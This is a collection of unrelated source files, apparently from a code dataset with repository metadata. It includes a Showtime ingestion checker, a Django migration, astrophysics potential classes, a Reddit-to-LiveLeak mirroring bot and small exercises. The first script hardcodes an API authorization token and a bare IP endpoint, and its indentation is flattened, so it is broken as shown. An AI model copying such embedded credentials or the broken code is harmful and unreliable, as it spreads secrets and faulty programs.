for jj in data_resp_showtime:
if jj["data_source"]=="ShowtimeAnyTime" and jj["type"]=="Program" and jj["sub_type"]=="SE":
showtime_projectx_id.append(jj["projectx_id"])
if len(showtime_projectx_id)>1:
q=q+1
writer.writerow({"showtime_id SE":str(i[0]),"projectx_id_showtime":showtime_projectx_id,"Comment":'Multiple ingestion for same content of Showtime'})
if len(showtime_projectx_id)==1:
r=r+1
if len(showtime_projectx_id)==0:
p=p+1
writer.writerow({"showtime_id SE":str(i[0]),"projectx_id_showtime":'',"Comment":'No Ingestion'})
print("total showtime id SE :", total1 ,"No ingestion: ", p, "Multiple mapped content :", q, "Total Fail: ", p+q, "Pass: ", r)
if i[1]=='tv_show':
total2=total2+1
try:
url_showtime="http://34.231.212.186:81/projectx/mappingfromsource?sourceIds=%d&sourceName=ShowtimeAnyTime&showType=SM" %i[0]
response_showtime=urllib2.Request(url_showtime)
response_showtime.add_header('Authorization','Token token=efeb15f572641809acbc0c26c9c1b63f4f7f1fd7dcb68070e45e26f3a40ec8e3')
resp_showtime=urllib2.urlopen(response_showtime)
data_showtime=resp_showtime.read()
data_resp_showtime=json.loads(data_showtime)
except httplib.BadStatusLine:
continue
except urllib2.HTTPError:
continue
except socket.error:
continue
for jj in data_resp_showtime:
if jj["data_source"]=="ShowtimeAnyTime" and jj["type"]=="Program" and jj["sub_type"]=="SM":
showtime_projectx_id.append(jj["projectx_id"])
if len(showtime_projectx_id)>1:
n=n+1
writer.writerow({"showtime_id SM":str(i[0]),"projectx_id_showtime":showtime_projectx_id,"Comment":'Multiple ingestion for same content of Showtime'})
if len(showtime_projectx_id)==1:
o=o+1
if len(showtime_projectx_id)==0:
m=m+1
writer.writerow({"showtime_id SM":str(i[0]),"projectx_id_showtime":'',"Comment":'No Ingestion'})
print("total showtime id SM :", total2 ,"No ingestion: ", m ,"Multiple mapped content :", n, "Total Fail: ", m+n, "Pass: ", o)
print("total showtime id MO:", total ,"No ingestion: ", l, "Multiple mapped content :", j, "Total Fail: ", l+j, "Pass: ", k)
print("total showtime id SE :", total1 ,"No ingestion: ", p, "Multiple mapped content :", q, "Total Fail: ", p+q, "Pass: ", r)
print("total showtime id SM :", total2 ,"No ingestion: ", m ,"Multiple mapped content :", n, "Total Fail: ", m+n, "Pass: ", o)
print("total showtime_anytime id :", total+total1+total2 ,"total No ingestion: ", m+p+l, "Multiple mapped content :", q+n+j, "Total Fail: ", m+p+l+q+n+j, "Pass: ", r+o+k)
print(datetime.datetime.now())
ingestion()
| [
"[email protected]"
] | |
32104a52bb1ffb03bb96243e4787ce2b62d3e161 | a5c57d60e11d6194ab590b43ee61c21dbe9d3675 | /src/bio2bel_drugbank/constants.py | 6fdc1f9a930062c372375cee9a62179b39b507e3 | [
"MIT"
] | permissive | sailfish009/drugbank_bio2bel | 5779365d02b85eecddda5e87358abf3b424464c4 | ccab91aacfa70e362ed25a9343d7dd47d619a26c | refs/heads/master | 2022-02-23T06:20:12.643593 | 2019-10-15T10:28:06 | 2019-10-15T10:28:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 378 | py | # -*- coding: utf-8 -*-
"""Constants for Bio2BEL DrugBank."""
import os
from bio2bel.utils import get_connection, get_data_dir
VERSION = '0.1.2-dev'
MODULE_NAME = 'drugbank'
DATA_DIR = get_data_dir(MODULE_NAME)
DRUGBANK_URL = 'https://www.drugbank.ca/releases/5-1-4/downloads/all-full-database'
DRUGBANK_PATH = os.path.join(DATA_DIR, 'drugbank_all_full_database.xml.zip')
| [
"[email protected]"
] | |
29c705cad1edefde7a3423ca8e3cb007bcdd5fe8 | 67954fee55a838d3c14ea5758b178f7fddb7d5f7 | /teacher/migrations/0001_initial.py | 3867ed4443a95746325d5ff6c2661d334d11b7ac | [] | no_license | Abel-Fan/student_admin | 899ce1130273fec0905ca4de1fe3c37e6e456b05 | e3c1b96f048273dda20b975917a66dabe97b8851 | refs/heads/master | 2020-06-06T10:17:44.563845 | 2019-06-20T09:54:24 | 2019-06-20T09:54:24 | 192,711,810 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 720 | py | # Generated by Django 2.1.1 on 2019-06-20 06:55
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
('student', '0002_auto_20190620_1451'),
]
operations = [
migrations.CreateModel(
name='Teacher',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=20, verbose_name='姓名')),
('project', models.CharField(max_length=20, verbose_name='课程')),
('student_id', models.ManyToManyField(to='student.Student')),
],
),
]
| [
"[email protected]"
] | |
980f6bbb5dc5a2a639e07f041266478030497e29 | 11ada50b47a245278a41b1f2cdae60bc387937da | /gala/potential/potential/builtin/pybuiltin.py | d2a6888e172a89a36bb718859afae3aa8bd2bd42 | [
"MPL-1.1",
"MIT"
] | permissive | ltlancas/gala | 7ec9111e3bf9f49823f393ad08f04aa4c34cf0df | 2621bb599d67e74a85446abf72d5930ef70ca181 | refs/heads/master | 2020-03-25T21:03:56.114744 | 2018-05-12T16:24:46 | 2018-05-12T16:24:46 | 144,157,811 | 1 | 0 | MIT | 2018-08-09T13:40:53 | 2018-08-09T13:40:53 | null | UTF-8 | Python | false | false | 4,211 | py | # coding: utf-8
from __future__ import division, print_function
# Standard library
from collections import OrderedDict
# Third-party
import numpy as np
from ..core import PotentialBase
from ....util import atleast_2d
__all__ = ["HarmonicOscillatorPotential", "KuzminPotential"]
class HarmonicOscillatorPotential(PotentialBase):
r"""
Represents an N-dimensional harmonic oscillator.
.. math::
\Phi = \frac{1}{2}\omega^2 x^2
Parameters
----------
omega : numeric
Frequency.
units : iterable(optional)
Unique list of non-reducable units that specify (at minimum) the
length, mass, time, and angle units.
"""
def __init__(self, omega, units=None):
parameters = OrderedDict()
parameters['omega'] = np.atleast_1d(omega)
super(HarmonicOscillatorPotential, self).__init__(units=units,
parameters=parameters,
ndim=len(parameters['omega']))
def _energy(self, q, t=0.):
om = np.atleast_1d(self.parameters['omega'].value)
return np.sum(0.5 * om[None]**2 * q**2, axis=1)
def _gradient(self, q, t=0.):
om = np.atleast_1d(self.parameters['omega'].value)
return om[None]**2 * q
def _hessian(self, q, t=0.):
om = np.atleast_1d(self.parameters['omega'].value)
return np.tile(np.diag(om)[:,:,None], reps=(1,1,q.shape[0]))
def action_angle(self, w):
"""
Transform the input cartesian position and velocity to action-angle
coordinates the Harmonic Oscillator potential. This transformation
is analytic and can be used as a "toy potential" in the
Sanders & Binney 2014 formalism for computing action-angle coordinates
in _any_ potential.
Adapted from Jason Sanders' code
`genfunc <https://github.com/jlsanders/genfunc>`_.
Parameters
----------
w : :class:`gala.dynamics.PhaseSpacePosition`, :class:`gala.dynamics.Orbit`
The positions or orbit to compute the actions, angles, and frequencies at.
"""
from ....dynamics.analyticactionangle import harmonic_oscillator_to_aa
return harmonic_oscillator_to_aa(w, self)
# def phase_space(self, actions, angles):
# """
# Transform the input action-angle coordinates to cartesian position and velocity
# assuming a Harmonic Oscillator potential. This transformation
# is analytic and can be used as a "toy potential" in the
# Sanders & Binney 2014 formalism for computing action-angle coordinates
# in _any_ potential.
# Adapted from Jason Sanders' code
# `genfunc <https://github.com/jlsanders/genfunc>`_.
# Parameters
# ----------
# x : array_like
# Positions.
# v : array_like
# Velocities.
# """
# from ...dynamics.analyticactionangle import harmonic_oscillator_aa_to_xv
# return harmonic_oscillator_aa_to_xv(actions, angles, self)
class KuzminPotential(PotentialBase):
r"""
The Kuzmin flattened disk potential.
.. math::
\Phi = -\frac{Gm}{\sqrt{x^2 + y^2 + (a + |z|)^2}}
Parameters
----------
m : numeric
Mass.
a : numeric
Flattening parameter.
units : iterable
Unique list of non-reducable units that specify (at minimum) the
length, mass, time, and angle units.
"""
def __init__(self, m, a, units):
parameters = OrderedDict()
parameters['m'] = m
parameters['a'] = a
super(KuzminPotential, self).__init__(units=units,
parameters=parameters)
def _energy(self, q, t):
x,y,z = q
m = self.parameters['m']
a = self.parameters['a']
val = -self.G * m / np.sqrt(x**2 + y**2 + (a + np.abs(z))**2)
return val
def _gradient(self, q, t):
x,y,z = q
m = self.parameters['m']
a = self.parameters['a']
fac = self.G * m / (x**2 + y**2 + (a + np.abs(z))**2)**1.5
return fac[None,...] * q
| [
"[email protected]"
] | |
d86d4bc54409db664185d5391f137bd863fcb162 | 0872e3dc1d71ffc8c6426f77c7d1409fc523e088 | /rlb/main.py | 36d133417ff2b0941b040cf4147dc3629f603b20 | [] | no_license | mpenkov/reddit-liveleak-bot | c0a367f15609e58227f661c99ab6ea17808e0b99 | 4ec35c0a941f269257b6a431cc6de1de8827b3ed | refs/heads/master | 2020-07-21T11:42:21.192096 | 2015-02-07T08:17:48 | 2015-02-07T08:17:48 | 21,909,013 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,730 | py | import praw
from praw.errors import APIException
import datetime as dt
import os
import os.path as P
import yaml
import logging
import time
#
# http://blog.tplus1.com/blog/2007/09/28/the-python-logging-module-is-much-better-than-print-statements/
#
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
#
# http://stackoverflow.com/questions/11029717/how-do-i-disable-log-messages-from-the-requests-library
#
requests_log = logging.getLogger("requests")
requests_log.setLevel(logging.WARNING)
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from sqlalchemy.orm.exc import NoResultFound
import liveleak
import youtube
from orm import Subreddit, Video
COMMENT_MIRROR = "[**Mirror**](http://www.liveleak.com/view?i=%s)"
COMMENT_FOOTER = """
---
^| [^Feedback](http://www.reddit.com/r/redditliveleakbot/)
^| [^FAQ](http://www.reddit.com/r/redditliveleakbot/wiki/index) ^|"""
def transaction(func):
"""Wrap up a function call as a transaction.
If the transaction succeeds, commit the session.
If something goes wrong, roll the session back.
Returns whatever the inner method returned on success,
or None on failure."""
def inner(self, *args, **kwargs):
try:
ret = func(self, *args, **kwargs)
self.db.commit()
return ret
except Exception as ex:
logger.exception(ex)
self.db.rollback()
return None
return inner
def error_prone_praw_api_call(func):
"""Used to decorate the most error-prone PRAW API calls.
For example, commenting on a submission can fail if the submission has
been deleted."""
def inner(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
except APIException as ex:
logger.exception(ex)
return None
return inner
def locate_video(subdir, video_id):
for f in os.listdir(subdir):
if f.startswith(video_id):
return P.join(subdir, f)
class Config(object):
def __init__(self, config_path=None):
if config_path is None:
config_path = P.join(P.dirname(P.abspath(__file__)),
"conf/config.yml")
with open(config_path) as fin:
doc = yaml.load(fin)
self.limit = int(doc["limit"])
self.dest_dir = doc["videopath"]
self.user_agent = doc["user_agent"]
self.liveleak_username = doc["liveleak"]["username"]
self.liveleak_password = doc["liveleak"]["password"]
self.reddit_username = doc["reddit"]["username"]
self.reddit_password = doc["reddit"]["password"]
self.google_developer_key = doc["google_developer_key"]
self.hold_hours = doc["hold_hours"]
self.subreddits = {}
for sub in doc["subreddits"]:
self.subreddits[sub] = doc["subreddits"][sub]["liveleak_category"]
self.dbpath = doc["dbpath"]
class Bot(object):
def __init__(self, config_path=None):
self.cfg = Config(config_path)
if not P.isdir(self.cfg.dest_dir):
os.makedirs(self.cfg.dest_dir)
engine = create_engine(self.cfg.dbpath)
Session = sessionmaker(bind=engine)
self.db = Session()
self.r = praw.Reddit(self.cfg.user_agent)
self.r.login(self.cfg.reddit_username, self.cfg.reddit_password)
self.uploader = liveleak.Uploader(self.cfg.user_agent)
self.uploader.login(self.cfg.liveleak_username,
self.cfg.liveleak_password)
def monitor(self):
"""Monitor all subreddits specified in the config.xml file."""
for subreddit in self.cfg.subreddits:
self.download_new_videos(subreddit)
self.monitor_deleted_videos()
self.make_stale()
@transaction
def get_subreddit_info(self, sr):
try:
sub_info = self.db.query(Subreddit).filter_by(id=sr).one()
except NoResultFound:
sub_info = Subreddit(id=sr)
self.db.add(sub_info)
return sub_info
def download_new_videos(self, subreddit):
"""Monitors the specific subreddit for new submissions that
link to YouTube videos."""
meth_name = "download_new_videos"
sub_info = self.get_subreddit_info(subreddit)
now = dt.datetime.now()
for new_submission in self.r.get_subreddit(
subreddit).get_new(limit=self.cfg.limit):
created = dt.datetime.fromtimestamp(new_submission.created_utc)
if created < sub_info.mostRecentSubmission:
break
youtube_id = youtube.extract_id(new_submission.url)
logger.debug("%s: youtube_id: %s", meth_name, youtube_id)
if youtube_id is None:
logger.debug("skipping submission URL: %s",
new_submission.url)
continue
logger.info("%s: new video submission: %s %s %s", meth_name,
new_submission.permalink, new_submission.url,
youtube_id)
download = True
try:
v = self.db.query(Video).filter_by(youtubeId=youtube_id).one()
download = not v.has_file()
except NoResultFound:
pass
if download:
self.download_video(youtube_id, new_submission.permalink)
sub_info.mostRecentSubmission = now
self.db.commit()
@transaction
def download_video(self, youtube_id, permalink):
"""Download the video with the specified YouTube ID.
If it has already been downloaded, the actual download is skipped.
Returns a Video instance.
"""
try:
v = self.db.query(Video).filter_by(youtubeId=youtube_id).one()
except NoResultFound:
v = Video(youtube_id, permalink)
self.db.add(v)
v.localPath = locate_video(self.cfg.dest_dir, v.youtubeId)
if v.localPath is None:
youtube.download(self.cfg.dest_dir, v.youtubeId)
v.localPath = locate_video(self.cfg.dest_dir, v.youtubeId)
if v.localPath is None:
v.state = Video.ERROR
else:
v.state = Video.DOWNLOADED
v.downloaded = dt.datetime.now()
v.localModified = dt.datetime.now()
return v
@transaction
def make_stale(self):
"""Make all data that hasn't been updated in self.hold_hours
hours stale."""
cutoff = dt.datetime.now() - dt.timedelta(hours=self.cfg.hold_hours)
for video in self.db.query(Video).filter_by(state=Video.DOWNLOADED):
if video.discovered is None or video.discovered < cutoff:
video.state = Video.STALE
video.localModified = dt.datetime.now()
def purge(self):
"""Delete stale and reposted video data."""
for video in self.db.query(Video).filter_by(state=Video.STALE):
self.purge_video(video)
for video in self.db.query(Video).filter_by(state=Video.REPOSTED):
self.purge_video(video)
for video in self.db.query(Video):
if not video.has_file():
self.purge_video(video)
@transaction
def purge_video(self, video):
if video.has_file():
logger.info("removing %s", video.localPath)
try:
os.remove(video.localPath)
except OSError as ose:
logger.exception(ose)
video.localPath = None
video.state = Video.PURGED
video.localModified = dt.datetime.now()
@transaction
def repost_video(self, video):
meth_name = "repost_video"
submission = self.r.get_submission(video.redditSubmissionPermalink)
subreddit = submission.subreddit.display_name
body = "repost of http://youtube.com/watch?v=%s from %s" % (
video.youtubeId, submission.permalink)
logger.info("%s: %s", meth_name, body)
if not video.has_file():
#
# If we're reposting, then the video has already been deleted from
# YouTube. If we don't have the video downloaded by now, there's
# nothing we can do.
#
logger.info("%s: giving up on %s", meth_name, video.youtubeId)
video.state = Video.STALE
elif video.liveleakId is None:
category = self.cfg.subreddits[subreddit]
logger.debug("%s: category: %s", meth_name, category)
file_token, connection = self.uploader.upload(video.localPath)
video.liveleakId = self.uploader.publish(submission.title, body,
subreddit, category,
connection)
video.state = Video.REPOSTED
def check_replies(self, submission):
"""Return true if we've replied to the submission already.
Ideally, we shouldn't have to check for this over the wire, since
our database should be sufficient. However, it avoids embarrassing
multi-posts in some cases, e.g. database has been reset."""
meth_name = "check_replies"
reply_authors = [r.author.name for r in submission.comments
if r.author]
result = self.cfg.reddit_username in reply_authors
if result:
logger.info("%s: we have already replied to this submission: %s",
meth_name, submission.permalink)
return result
def monitor_deleted_videos(self):
"""Go through all our downloaded videos and check if they have
been deleted from YouTube. If yes, repost them."""
for v in self.db.query(Video).filter_by(state=Video.DOWNLOADED):
try:
if youtube.video_exists(v.youtubeId, self.cfg.user_agent,
self.cfg.google_developer_key):
continue
except youtube.YoutubeException:
time.sleep(5)
continue
submission = self.r.get_submission(v.redditSubmissionPermalink)
if self.check_replies(submission):
continue
self.repost_video(v)
if v.liveleakId is None:
continue
self.post_comment(submission, v.liveleakId)
v.deleted = dt.datetime.now()
self.db.commit()
@error_prone_praw_api_call
def post_comment(self, submission, liveleak_id):
comment = (COMMENT_MIRROR % liveleak_id) + COMMENT_FOOTER
submission.add_comment(comment)
| [
"[email protected]"
] | |
abd0e4369ed4686d8a57e4903580a0d3336d78b0 | 7e98a8b31cc2fecf8384f4590f27540f7280659a | /v1/LinkedLists/mirror_subtraction.py | b9bf4ac6f787e73961c467e99aa83d9e78408879 | [] | no_license | darraes/coding_questions | 62a07a6ede884fd0e3596f3dac8f50e11fd8676e | 70dcc3b859db673c39c3cf55aeb463d2bd822ed9 | refs/heads/master | 2021-01-21T07:21:18.033321 | 2020-06-15T16:25:11 | 2020-06-15T16:25:11 | 91,611,595 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,274 | py | # http://www.careercup.com/question?id=5657550909341696
class Node:
def __init__(self, next, value):
self._next = next
self._value = value
def revert(node):
if node == None: raise
elif node._next == None:
return (node, node)
else:
tail, head = revert(node._next)
tail._next = node
node._next = None
return (node, head)
def solve(node):
slow = fast = firstHalf = node
secondHalf = None
while slow._next != None:
if fast._next == None or fast._next._next == None:
secondHalf = slow._next
slow._next = None
break
else:
slow = slow._next
fast = fast._next._next
headF = firstHalf
tailF = slow
tail, secondHalf = revert(secondHalf)
headS = secondHalf
while firstHalf != None:
if secondHalf != None:
firstHalf._value -= secondHalf._value
secondHalf = secondHalf._next
else:
firstHalf._value = 0
firstHalf = firstHalf._next
tail, headS = revert(headS)
tailF._next = headS
return headF
head = Node(Node(Node(Node(Node(None, 10), 5), 4), 9), 10)
new = solve(head) | [
"[email protected]"
] | |
b006e071b4eedcdff17cc409c2ad17895603ea12 | 4342ef8afa6a0790690f711d28c0ce2c78711c67 | /seed_database.py | 921aa0c13ce449678e4383c184f066f8bd5a1fa0 | [] | no_license | christinababaya/ratings-v2 | fe03413af9042942204aa69980a3ce2415411c14 | 2812bc1493607fb4f04b62c1e84b4d9efb396937 | refs/heads/master | 2023-03-25T20:39:38.191009 | 2021-03-26T16:00:14 | 2021-03-26T16:00:14 | 351,493,197 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 951 | py | import os
import json
from random import choice, randint
from datetime import datetime
import crud
import model
import server
os.system('dropdb ratings')
os.system('createdb ratings')
model.connect_to_db(server.app)
model.db.create_all()
with open('data/movies.json') as f:
movie_data = json.loads(f.read())
movies_in_db=[]
for movie in movie_data:
title, overview, poster_path= movie['title'], movie['overview'],movie['poster_path']
release_date = datetime.strptime(movie['release_date'], '%Y-%m-%d')
db_movie= crud.create_movie(title, overview, release_date, poster_path)
movies_in_db.append(db_movie)
for n in range(10):
email = f'user{n}@test.com'
password= 'test'
user = crud.create_user(email, password)
for _ in range(10):
random_movie= choice(movies_in_db)
score= randint(1,5)
crud.create_rating(user, random_movie, score) | [
"[email protected]"
] | |
44019f8e0054c62342b61280690b6ff62aac80ff | 8b576f16cfd9202f756611001e684657dde3e812 | /03_TryExcept/venv/Scripts/pip3.7-script.py | 68fc52157e004291293a7e15bf0d026173449d4c | [] | no_license | WenhaoChen0907/Python_Demo | 26cc4d120aaa990c2d26fd518dfe6bcb622b1d77 | 136b8ced40623b0970c2a5bd47852425dcac3e86 | refs/heads/master | 2023-02-23T23:58:09.584321 | 2021-01-30T11:49:50 | 2021-01-30T11:49:50 | 334,374,597 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 409 | py | #!E:\python-pycharm\03_TryExcept\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip3.7'
__requires__ = 'pip==19.0.3'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==19.0.3', 'console_scripts', 'pip3.7')()
)
| [
"[email protected]"
] | |
92ec7ed041e603e068af5792813e85378c4cca01 | 9d454ae0d5dd1d7e96e904ced80ca502019bb659 | /1720_decode.py | 8f1c93438180b711a3300877bb9f7e9cc36a7969 | [] | no_license | zzz686970/leetcode-2018 | dad2c3db3b6360662a90ea709e58d7facec5c797 | 16e4343922041929bc3021e152093425066620bb | refs/heads/master | 2021-08-18T08:11:10.153394 | 2021-07-22T15:58:52 | 2021-07-22T15:58:52 | 135,581,395 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 266 | py | class Solution:
def decode(self, encoded: List[int], first: int) -> List[int]:
# ans = [first]
# for el in encoded:
# ans.append(el ^ ans[-1])
# return ans
return list(accumulate([first] + encoded, lambda x, y: x ^ y)) | [
"[email protected]"
] | |
280e83ef0782347a3afd107ead0084773b84c6ae | aa8af4dc70c14339a05489b0c4c4925d7a00e319 | /starbox_custom/starbox_custom/doctype/store/test_store.py | 908d6e2311d2d1c252d713c5f8fb6e7b22ab9769 | [
"MIT"
] | permissive | vhrspvl/starbox-custom | 925768540b318ee923dd6587291fbece003fd17e | 0d1143e64119cff66ad52fbe8453fa7281b62998 | refs/heads/master | 2021-05-13T21:35:17.327744 | 2019-07-24T16:11:50 | 2019-07-24T16:11:50 | 116,466,334 | 0 | 2 | null | 2018-08-13T15:05:27 | 2018-01-06T08:15:26 | Python | UTF-8 | Python | false | false | 217 | py | # -*- coding: utf-8 -*-
# Copyright (c) 2019, Starboxes India and Contributors
# See license.txt
from __future__ import unicode_literals
import frappe
import unittest
class TestStoreKeeper(unittest.TestCase):
pass
| [
"[email protected]"
] | |
01040de6b5d4ea3274ea3ea17e71b4643c1b4001 | b483c598fa375e9af02348960f210b9f482bd655 | /cursoemvideo/desafios/Desafio075.py | 48338306d4a75934c3af6b61e07b9ea8b5210c04 | [
"MIT"
] | permissive | brunofonsousa/python | 6f766d08bf193180ea9a4903cb93ffd167db588d | 8f2f26c77015c0baaa76174e004406b4115272c7 | refs/heads/master | 2022-09-30T14:58:01.080749 | 2020-06-08T09:55:35 | 2020-06-08T09:55:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,504 | py | '''
Exercício Python 075: Desenvolva um programa que leia quatro valores pelo teclado e guarde-os em uma tupla. No final, mostre:
A) Quantas vezes apareceu o valor 9.
B) Em que posição foi digitado o primeiro valor 3.
C) Quais foram os números pares.
'''
## VERSÃO GUANABARA:
num = (int(input("Digite um número: ")),
int(input("Digite outro número: ")),
int(input("Digite mais um número: ")),
int(input("Digite o último número: ")))
print(f"O valor 9 apareceu {num.count(9)} vezes")
if 3 in num:
print(f"O valor 3 apareceu na {num.index(3)+1}ª posição")
else:
print("O valor 3 não foi digitado em nenhuma posição")
print(f"Os valores pares digitados foram ", end="")
for n in num:
if n % 2 == 0:
print(n, end=" ")
else:
pass
## VERSÃO BRUNO:
varia = ['um', 'outro', 'mais um', 'último']
tupla=()
for i in range(4):
num = int(input(f"Digite {varia[i]} número: "))
tupla = tupla + (num,)
print("Você digitou os valores:", (tupla))
vezes = 0
for i in range(len(tupla)):
#x = tupla.count(tupla[i])
x = tupla[i]
if x == 9:
vezes += 1
else:
pass
for i in range(len(tupla)):
if tupla[i] == 3:
primeiro = i
break
else:
pass
par = 0
for i in tupla:
if i % 2 == 0:
par += 1
else:
pass
print(f"O valor 9 apareceu {vezes} vezes")
print(f"O valor 3 apareceu na {primeiro}ª posição")
print(f"Os valores pares digitados foram {par}")
| [
"[email protected]"
] | |
42578ba3422cde2aa409b7883dec36b75c62a800 | 781e2692049e87a4256320c76e82a19be257a05d | /all_data/exercism_data/python/leap/f8586ba81c1349918117ff21ab2d5b5e.py | 48a969f886f37d77fddd9072875bff7e3adeb896 | [] | no_license | itsolutionscorp/AutoStyle-Clustering | 54bde86fe6dbad35b568b38cfcb14c5ffaab51b0 | be0e2f635a7558f56c61bc0b36c6146b01d1e6e6 | refs/heads/master | 2020-12-11T07:27:19.291038 | 2016-03-16T03:18:00 | 2016-03-16T03:18:42 | 59,454,921 | 4 | 0 | null | 2016-05-23T05:40:56 | 2016-05-23T05:40:56 | null | UTF-8 | Python | false | false | 95 | py | #!/usr/bin/env python
def is_leap_year(y):
return y%400 == 0 or (y%4 == 0 and y%100 != 0)
| [
"[email protected]"
] | |
e966f04e9525fb6b367303324e44fbcbcfcfae94 | 221b2221703f9cddeee7054c5dc426b81a3f53bd | /venv/lib/python3.9/site-packages/pyrogram/raw/functions/langpack/get_language.py | e88bc93e119755902d6020efd7ffc9cf8d817575 | [] | no_license | ch3p4ll3/Royal-Racing-Bot | 37c998a650078e4b5f5c3b34b8c081d52b018944 | eab5baf61a9782fbedd42ddf35b7e11cbae9ec22 | refs/heads/main | 2023-06-26T03:34:58.104068 | 2021-07-30T17:36:14 | 2021-07-30T17:36:14 | 348,089,837 | 1 | 0 | null | 2021-03-20T11:32:46 | 2021-03-15T18:59:39 | Python | UTF-8 | Python | false | false | 2,400 | py | # Pyrogram - Telegram MTProto API Client Library for Python
# Copyright (C) 2017-2021 Dan <https://github.com/delivrance>
#
# This file is part of Pyrogram.
#
# Pyrogram is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Pyrogram is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Pyrogram. If not, see <http://www.gnu.org/licenses/>.
from io import BytesIO
from pyrogram.raw.core.primitives import Int, Long, Int128, Int256, Bool, Bytes, String, Double, Vector
from pyrogram.raw.core import TLObject
from pyrogram import raw
from typing import List, Union, Any
# # # # # # # # # # # # # # # # # # # # # # # #
# !!! WARNING !!! #
# This is a generated file! #
# All changes made in this file will be lost! #
# # # # # # # # # # # # # # # # # # # # # # # #
class GetLanguage(TLObject): # type: ignore
"""Telegram API method.
Details:
- Layer: ``122``
- ID: ``0x6a596502``
Parameters:
lang_pack: ``str``
lang_code: ``str``
Returns:
:obj:`LangPackLanguage <pyrogram.raw.base.LangPackLanguage>`
"""
__slots__: List[str] = ["lang_pack", "lang_code"]
ID = 0x6a596502
QUALNAME = "functions.langpack.GetLanguage"
def __init__(self, *, lang_pack: str, lang_code: str) -> None:
self.lang_pack = lang_pack # string
self.lang_code = lang_code # string
@staticmethod
def read(data: BytesIO, *args: Any) -> "GetLanguage":
# No flags
lang_pack = String.read(data)
lang_code = String.read(data)
return GetLanguage(lang_pack=lang_pack, lang_code=lang_code)
def write(self) -> bytes:
data = BytesIO()
data.write(Int(self.ID, False))
# No flags
data.write(String(self.lang_pack))
data.write(String(self.lang_code))
return data.getvalue()
| [
"[email protected]"
] | |
8bcd712f4be349d7fe2b89d4ff19355202af1010 | b2ba670818623f8ab18162382f7394baed97b7cb | /test-data/AndroidSlicer/Chart/DD/8.py | 09e5ae21e49aeca31e6e629fd56dbf73b0e2b860 | [
"MIT"
] | permissive | hsumyatwin/ESDroid-artifact | 012c26c40537a79b255da033e7b36d78086b743a | bff082c4daeeed62ceda3d715c07643203a0b44b | refs/heads/main | 2023-04-11T19:17:33.711133 | 2022-09-30T13:40:23 | 2022-09-30T13:40:23 | 303,378,286 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 990 | py | #start monkey test
import os;
from subprocess import Popen
from subprocess import PIPE
from com.android.monkeyrunner import MonkeyRunner, MonkeyDevice, MonkeyImage
from com.android.monkeyrunner.MonkeyDevice import takeSnapshot
from com.android.monkeyrunner.easy import EasyMonkeyDevice
from com.android.monkeyrunner.easy import By
from com.android.chimpchat.hierarchyviewer import HierarchyViewer
from com.android.monkeyrunner import MonkeyView
import random
import sys
import subprocess
from sys import exit
from random import randint
device = MonkeyRunner.waitForConnection()
easy_device=EasyMonkeyDevice(device)
package = 'es.senselesssolutions.gpl.weightchart'
activity ='es.senselesssolutions.gpl.weightchart.ChartActivity'
runComponent = package+'/'+activity
device.startActivity(component=runComponent)
MonkeyRunner.sleep(1)
device.touch(487,1689, 'DOWN_AND_UP')
MonkeyRunner.sleep(1)
device.touch(1619,983, 'DOWN_AND_UP')
MonkeyRunner.sleep(1)
device.touch(558,1730, 'DOWN_AND_UP')
| [
"[email protected]"
] | |
4a2c91451796f219d51b74f12ba3c8156185b68d | 79041f273c057b2fbb115b35494b13250ac7a42c | /bel/lang/migrate_1_2.py | a33ee3c88896e423a30211e7b124513032101612 | [
"Apache-2.0"
] | permissive | belbio/bel | 3786b65a10d44735407b0e79c8489bea1df58863 | 14ff8e543a679e7dfff3f38f31c0f91ffd55e4d8 | refs/heads/master | 2022-12-08T23:02:28.242510 | 2020-12-21T16:17:47 | 2020-12-21T16:17:47 | 116,027,945 | 6 | 2 | Apache-2.0 | 2022-06-01T23:58:52 | 2018-01-02T15:14:32 | Python | UTF-8 | Python | false | false | 6,958 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Migrate BEL from 1 to 2.0.0
#
# Standard Library
import json
# Third Party
from loguru import logger
# Local
import bel.belspec.crud
import bel.core.settings as settings
from bel.belspec.crud import get_enhanced_belspec
from bel.lang.ast import BELAst, Function, NSArg, StrArg
from bel.lang.belobj import BEL
version = bel.belspec.crud.get_latest_version()
bo = BEL("", version=version)
belspec = get_enhanced_belspec(bo.version)
def migrate(belstr: str) -> str:
"""Migrate BEL 1 to 2.0.0
Args:
bel: BEL 1
Returns:
bel: BEL 2
"""
bo.parse(belstr)
return migrate_ast(bo.ast).to_string()
def migrate_into_triple(belstr: str) -> str:
"""Migrate BEL1 assertion into BEL 2.0.0 SRO triple"""
bo.parse(belstr)
return migrate_ast(bo.ast).to_triple()
def migrate_ast(ast: BELAst) -> BELAst:
# Process Subject
bo.ast.subject = convert(bo.ast.subject)
if bo.ast.object:
if bo.ast.object.type == "BELAst":
bo.ast.object.subject = convert(bo.ast.object.subject)
if bo.ast.object.object:
bo.ast.object.object = convert(bo.ast.object.object)
else:
